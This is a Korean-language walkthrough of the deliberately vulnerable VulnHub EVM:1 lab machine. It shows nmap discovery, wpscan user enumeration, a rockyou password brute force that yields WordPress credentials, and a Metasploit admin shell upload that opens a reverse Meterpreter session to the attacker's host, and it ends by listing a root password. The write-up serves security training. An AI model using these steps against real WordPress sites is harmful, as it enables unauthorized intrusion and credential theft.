[Vulnhub] EVM Walkthrough

 

https://www.vulnhub.com/entry/evm-1,391/

EVM: 1

 

 

Reconnaissance

1. Discovery

└─$ sudo nmap -sn 192.168.45.0/24 -oA ./recon/targetSubScan
Nmap scan report for 192.168.45.174
Host is up (0.00027s latency).
MAC Address: 08:00:27:C6:8A:38 (Oracle VirtualBox virtual NIC)

 

2. Port Scanning

All port scan

 

 

3. SMB

check null Session and anonymous session

 

using enum4linux

i found username

 

not interesting

 

 

4. HTTP(WEB)

apache2 default page인 It work가 뜨네요,

page source,

robots.txt은 딱히 흥미로운것이 없는데 웹사이트 중간에 /wordpress로 오면 취약한 웹앱을 찾을 수 있다,.. 라고합니다

워드프레스가 구성되어있을 것으로 예상 됩니다

유저 정보를 획득했고, 나머지 별다른 특이점이 없어 취약점 분석으로 넘어가보겠습니다

# wordpress username

c0rrupt3d_brain

 

 

Vulnerability

wpscan 툴을 이용하여 워드프레스에 어떤 취약점이 존재하는지 파악합니다

└─$ wpscan --url http://192.168.45.174/wordpress/ --enumerate

c0rrupt3d_brain 유저를 이용하여 비밀번호 브루트포싱 공격을 진행해봅니다

 

└─$ wpscan --url http://192.168.45.174/wordpress/ -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt

 

하나 찾았습니다!!

# wordpress credentials

c0rrupt3d_brain:24992499

 

 

Exploitation

웹페이지의 대부분이 라우트가 안되서 접속이 안되기 때문에 metasploit 을 이용하여 익스플로잇을 진행합니다

 

msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
                                                                                                                                                             
[*] Started reverse TCP handler on 192.168.45.219:4444 
[*] Authenticating with WordPress using c0rrupt3d_brain:24992499...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wordpress/wp-content/plugins/PlEBCILsug/KmIUSyQktT.php...
[*] Sending stage (39927 bytes) to 192.168.45.174
[+] Deleted KmIUSyQktT.php
[+] Deleted PlEBCILsug.php
[+] Deleted ../PlEBCILsug
[*] Meterpreter session 2 opened (192.168.45.219:4444 -> 192.168.45.174:37076) at 2024-07-12 17:36:23 +0900

meterpreter > shell
Process 2505 created.
Channel 0 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
id; hostname; ip a
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ubuntu-extermely-vulnerable-m4ch1ine
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:c6:8a:38 brd ff:ff:ff:ff:ff:ff
    inet 192.168.45.174/24 brd 192.168.45.255 scope global enp0s3
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fec6:8a38/64 scope link 
       valid_lft forever preferred_lft forever
3: virbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default qlen 1000
    link/ether 52:54:00:c5:7d:1b brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.1/24 brd 192.168.122.255 scope global virbr0
       valid_lft forever preferred_lft forever
4: virbr0-nic: <BROADCAST,MULTICAST> mtu 1500 qdisc pfifo_fast master virbr0 state DOWN group default qlen 1000
    link/ether 52:54:00:c5:7d:1b brd ff:ff:ff:ff:ff:ff

대상 호스트에 초기 침투 완료

 

wp-config.php 파일을 확보하여 데이터베이스는 장악을 완료했습니다

 

 

Privilege Escalation

# credentials
root:willy26

 

 

쉬...쉽네요..ㅎ